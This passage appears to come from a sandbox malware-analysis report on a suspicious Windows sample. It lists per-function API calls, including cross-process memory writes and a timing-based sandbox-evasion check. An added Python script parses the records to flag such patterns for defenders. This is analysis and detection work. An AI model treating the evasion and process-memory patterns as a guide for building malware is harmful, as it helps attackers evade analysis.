                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0081B27F
                                                        • _wcsstr.LIBCMT ref: 0081B289
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: 37b1ce131ff5abe87c88a69b623013cc714bb3f87ac0a5d330af74f6e39c27a4
                                                        • Instruction ID: 798fd4367f4cb0e3b0838abad3048a8a79854fd557ca5de7de3a4a1451d6cdff
                                                        • Opcode Fuzzy Hash: 37b1ce131ff5abe87c88a69b623013cc714bb3f87ac0a5d330af74f6e39c27a4
                                                        • Instruction Fuzzy Hash: DF21F571205244BAEB259B759C09EBF7B9CEF4A750F00413DF804DA1A2EBB5DC80D6A0
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0084B192
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0084B1B7
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0084B1CF
                                                        • GetSystemMetrics.USER32(00000004), ref: 0084B1F8
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00830E90,00000000), ref: 0084B216
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: 3488242fb1cf746da9e92e48ee95780c46944b9adafb38a1c9922c60f829a3fc
                                                        • Instruction ID: feb8a8c6d53b919c8dc71e3d627461453386a1229782bd12487912edf1cacedb
                                                        • Opcode Fuzzy Hash: 3488242fb1cf746da9e92e48ee95780c46944b9adafb38a1c9922c60f829a3fc
                                                        • Instruction Fuzzy Hash: 92218171A10669AFCB109F78DC14A6A7BA4FB06365F154739FA32D71E0E730D821DB90
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00819320
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00819352
                                                        • __itow.LIBCMT ref: 0081936A
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00819392
                                                        • __itow.LIBCMT ref: 008193A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID:
                                                        • API String ID: 2983881199-0
                                                        • Opcode ID: 3f216fd6be1b0d6e8a9cd77f6d658acf1d9a1d892623a771663bdaf50ddef6a3
                                                        • Instruction ID: adec30e5a699e34a353bed90dc88086bd6c2874cb2a8f33460e657cf348171ff
                                                        • Opcode Fuzzy Hash: 3f216fd6be1b0d6e8a9cd77f6d658acf1d9a1d892623a771663bdaf50ddef6a3
                                                        • Instruction Fuzzy Hash: 1821F531701208ABDB109A648C99EEE7BACFF59720F045029FA98D73C1DAB08D81C791
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00835A6E
                                                        • GetForegroundWindow.USER32 ref: 00835A85
                                                        • GetDC.USER32(00000000), ref: 00835AC1
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00835ACD
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00835B08
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: f43742da7646034d1a0ff61aa2811d6b85dcb22acca85fe6c1378d4e42a73f82
                                                        • Instruction ID: 8b210fbf71dc4961481b1f0fc7d085983eed32bff21b8b0c8be04826324cc8a9
                                                        • Opcode Fuzzy Hash: f43742da7646034d1a0ff61aa2811d6b85dcb22acca85fe6c1378d4e42a73f82
                                                        • Instruction Fuzzy Hash: 2A216F75A00214EFDB14EF69D888A9ABBE5FF89310F15847DF909D7362CA34AD40DB90
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007C134D
                                                        • SelectObject.GDI32(?,00000000), ref: 007C135C
                                                        • BeginPath.GDI32(?), ref: 007C1373
                                                        • SelectObject.GDI32(?,00000000), ref: 007C139C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: b0dd6a9ddae039b5b6fb5b7d3f3c66968b83ede66615112ecee29718d824aca1
                                                        • Instruction ID: 2f7d22c2034985fa315c1d2e61ab0457522d7dc5704e7e4a66d3dca942d5457b
                                                        • Opcode Fuzzy Hash: b0dd6a9ddae039b5b6fb5b7d3f3c66968b83ede66615112ecee29718d824aca1
                                                        • Instruction Fuzzy Hash: 02217F30800A48EFDB118F69DC08B6A7BE8FB02725F54423FF810965B2D7789891DF90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 9c3e76c0d3330143bdda30802ffc0ed2d0b0669b3edc472fb3718d8e40a986e5
                                                        • Instruction ID: 2e626c9d56cdc02d0903d623e4884f7011f24289a51bf35feff23a56376bab09
                                                        • Opcode Fuzzy Hash: 9c3e76c0d3330143bdda30802ffc0ed2d0b0669b3edc472fb3718d8e40a986e5
                                                        • Instruction Fuzzy Hash: 0F019EB260114DBBD2046B12AD42FFBB35CFF66398B044025FD15DA382EF69EE5482E1
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00824ABA
                                                        • __beginthreadex.LIBCMT ref: 00824AD8
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00824AED
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00824B03
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00824B0A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                        • String ID:
                                                        • API String ID: 3824534824-0
                                                        • Opcode ID: 606d15a03fd1b1168b67c3f9e11814b13c4eba579d5622af8dd39409b531cf91
                                                        • Instruction ID: ea0849e8f3330d84cb9282e63350d734435b5d580536dc46489ad114a2113eeb
                                                        • Opcode Fuzzy Hash: 606d15a03fd1b1168b67c3f9e11814b13c4eba579d5622af8dd39409b531cf91
                                                        • Instruction Fuzzy Hash: 1811047A905668FBC7018FACAC08A9B7FACFB45320F144269F924D3251DB75C944CBB1
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0081821E
                                                        • GetLastError.KERNEL32(?,00817CE2,?,?,?), ref: 00818228
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00817CE2,?,?,?), ref: 00818237
                                                        • HeapAlloc.KERNEL32(00000000,?,00817CE2,?,?,?), ref: 0081823E
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00818255
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: 1dbca632727dc704fe1f76196e25cb9c790b5aecb4aee7a834ee06af8c397cbe
                                                        • Instruction ID: 01d77674e2e39eba746a1530af1925bd0d61faf33993e3cc680df14ce049a1ea
                                                        • Opcode Fuzzy Hash: 1dbca632727dc704fe1f76196e25cb9c790b5aecb4aee7a834ee06af8c397cbe
                                                        • Instruction Fuzzy Hash: 05016975200204FFDB214FA6EC49DAB7BACFF9B755B60042DFE09C2220DA318C40CA60
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?,?,00817455), ref: 00817127
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?), ref: 00817142
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?), ref: 00817150
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?), ref: 00817160
                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?), ref: 0081716C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: 2b81866662fdb1447acdf7f51a4b8e90f9ce6e102107a1cbc23dfe09de8861b8
                                                        • Instruction ID: 4ef840d8555021a5017c99d4635798a8da509010a5bff2bc9cc0498db929a3d0
                                                        • Opcode Fuzzy Hash: 2b81866662fdb1447acdf7f51a4b8e90f9ce6e102107a1cbc23dfe09de8861b8
                                                        • Instruction Fuzzy Hash: CB015E76601208BBDB114F64DC44AAA7BBDFF49751F14006DFE05D6211D771DD81D7A0
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00825260
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0082526E
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00825276
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00825280
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008252BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 4c8b75c8047b26fe1b49af790a9775a4de5ca6a39709d4b7872e3f5b574091a0
                                                        • Instruction ID: e3f62603d057d25e4b1cc9c5e6e4ef5bc0ec4023710b02c54485001b0473145e
                                                        • Opcode Fuzzy Hash: 4c8b75c8047b26fe1b49af790a9775a4de5ca6a39709d4b7872e3f5b574091a0
                                                        • Instruction Fuzzy Hash: 8B011775D41A2DDBCF00EFE4E849AEDBB78FB0A711F41015AEA41F2281CB709590C7A1
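The per-function records above (call sites with recovered argument values, the API ID, and the fuzzy hashes) are what the Joe Sandbox IDA plugin emits for every function in the 007C0000 image. As an added example that is not part of this report or of Joe Sandbox, the following Python parses records in this layout into structured data and flags two patterns the report's signature list already calls out: the QueryPerformanceCounter/Sleep timing loop at 00825260 and the probe-then-allocate token query at 00818121 (GetTokenInformation called first with length 00000000, then HeapAlloc, then called again). The sample text is constructed from two records on this page with the Memory Dump Source block trimmed; the watchlist labels, `triage` and `repeated_apis` are my own.

```python
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample: two records in the layout of the IDA plugin output above.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?), ref: 00825260
• QueryPerformanceFrequency.KERNEL32(?,?), ref: 0082526E
• Sleep.KERNEL32(00000000,?), ref: 00825276
• QueryPerformanceCounter.KERNEL32(?,?), ref: 00825280
• Sleep.KERNEL32(?,00000000,?), ref: 008252BC
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• Instruction Fuzzy Hash: 8B011775D41A2DDBCF00EFE4E849AEDBB78FB0A711F41015AEA41F2281CB709590C7A1
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00818121
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0081812B
• GetProcessHeap.KERNEL32(00000008,?), ref: 0081813A
• HeapAlloc.KERNEL32(00000000,?), ref: 00818141
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?), ref: 00818157
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• Instruction Fuzzy Hash: 05016975200204FFDB214FA6EC49DAB7BACFF9B755B60042DFE09C2220DA318C40CA60
"""

# One call-site line: "• Api.MODULE(args), ref: ADDR"; the argument list and the
# "Part of subcall function XXXX:" prefix are both optional in the report.
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


@dataclass
class CallSite:
    api: str
    module: str
    args: list        # raw argument tokens as the report prints them
    ref: int          # address of the call instruction
    subcall: bool     # reported from a callee, not this function


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_id: str = ""
    fuzzy_hash: str = ""

    @property
    def api_names(self):
        return {c.api for c in self.calls if not c.subcall}

    @property
    def first_ref(self):
        own = [c.ref for c in self.calls if not c.subcall]
        return "%08X" % min(own) if own else ""


def parse_records(text):
    records, cur, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            in_apis = True
            continue
        if cur is None:
            continue
        if line in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            in_apis = False
            continue
        if in_apis:
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                cur.calls.append(CallSite(m["api"], m["mod"], args,
                                          int(m["ref"], 16), m["sub"] is not None))
            continue
        m = FIELD_RE.match(line)
        if m and m["key"] == "API ID":
            cur.api_id = m["val"]
        elif m and m["key"] == "Instruction Fuzzy Hash":
            cur.fuzzy_hash = m["val"]
    return records


def repeated_apis(rec):
    """APIs a function calls more than once: probe-then-fill and retry loops."""
    counts = Counter(c.api for c in rec.calls if not c.subcall)
    return {api for api, n in counts.items() if n >= 2}


# Hypothetical watchlist (my own labels): API sets that deserve a second look.
WATCHLIST = {
    "timing-check": ({"QueryPerformanceCounter", "Sleep"},
                     "elapsed time measured around Sleep; common debugger/sandbox check"),
    "token-query": ({"GetTokenInformation", "HeapAlloc"},
                    "process token queried into a heap buffer"),
}


def triage(records):
    hits = []
    for rec in records:
        for label, (needed, why) in WATCHLIST.items():
            if needed <= rec.api_names:
                hits.append((rec.first_ref, label, why))
    return hits


if __name__ == "__main__":
    for ref, label, why in triage(parse_records(SAMPLE)):
        print(ref, label, "-", why)
```

The parser keeps the report's argument tokens verbatim rather than trusting its labels: the annotation "00000003(TokenIntegrityLevel)" does not match the Windows TOKEN_INFORMATION_CLASS enumeration, where 3 is TokenPrivileges and TokenIntegrityLevel is 25, so the numeric value is what should drive any conclusion about which token field the sample reads. The 00000000 fourth argument on the first GetTokenInformation call is the zero-length size probe that produces the GetLastError/HeapAlloc sequence that follows it.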
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00818121
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0081812B
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0081813A
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00818141
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00818157
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0081C1F7
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0081C20E
                                                        • MessageBeep.USER32(00000000), ref: 0081C226
                                                        • KillTimer.USER32(?,0000040A), ref: 0081C242
                                                        • EndDialog.USER32(?,00000001), ref: 0081C25C
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 007C13BF
                                                        • StrokeAndFillPath.GDI32(?,?,007FB888,00000000,?), ref: 007C13DB
                                                        • SelectObject.GDI32(?,00000000), ref: 007C13EE
                                                        • DeleteObject.GDI32 ref: 007C1401
                                                        • StrokePath.GDI32(?), ref: 007C141C
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        APIs
                                                          • Part of subcall function 007E0DB6: std::exception::exception.LIBCMT ref: 007E0DEC
                                                          • Part of subcall function 007E0DB6: __CxxThrowException@8.LIBCMT ref: 007E0E01
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 007C7A51: _memmove.LIBCMT ref: 007C7AAB
                                                        • __swprintf.LIBCMT ref: 007D2ECD
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007D2D66
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        APIs
                                                          • Part of subcall function 007C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007C4743,?,?,007C37AE,?), ref: 007C4770
                                                        • CoInitialize.OLE32(00000000), ref: 0082B9BB
                                                        • CoCreateInstance.OLE32(00852D6C,00000000,00000001,00852BDC,?), ref: 0082B9D4
                                                        • CoUninitialize.OLE32 ref: 0082B9F1
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        Strings
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 007E50AD
                                                          • Part of subcall function 007F00F0: __87except.LIBCMT ref: 007F012B
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: 3c}$_}
                                                        • API String ID: 4104443479-2413270705
                                                        APIs
                                                          • Part of subcall function 008214BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00819296,?,?,00000034,00000800,?,00000034), ref: 008214E6
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0081983F
                                                          • Part of subcall function 00821487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008192C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008214B1
                                                          • Part of subcall function 008213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00821409
                                                          • Part of subcall function 008213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0081925A,00000034,?,?,00001004,00000000,00000000), ref: 00821419
                                                          • Part of subcall function 008213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0081925A,00000034,?,?,00001004,00000000,00000000), ref: 0082142F
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008198AC
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008198F9
                                                        Strings
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0084F910,00000000,?,?,?,?), ref: 008479DF
                                                        • GetWindowLongW.USER32 ref: 008479FC
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00847A0C
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00847B61
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00847B76
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '$0R
                                                        • API String ID: 3850602802-3210545720
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00847461
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00847475
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00847499
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00846D3B
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00846D4B
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00846D70
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 55d29a6067a900355ed5c4525736b95130825f69a59badebaf8d61fa18aa12ae
                                                        • Instruction ID: ef8a3b234981873296cb388534ddb19492cea59c25f9f80d19792adf7398c024
                                                        • Opcode Fuzzy Hash: 55d29a6067a900355ed5c4525736b95130825f69a59badebaf8d61fa18aa12ae
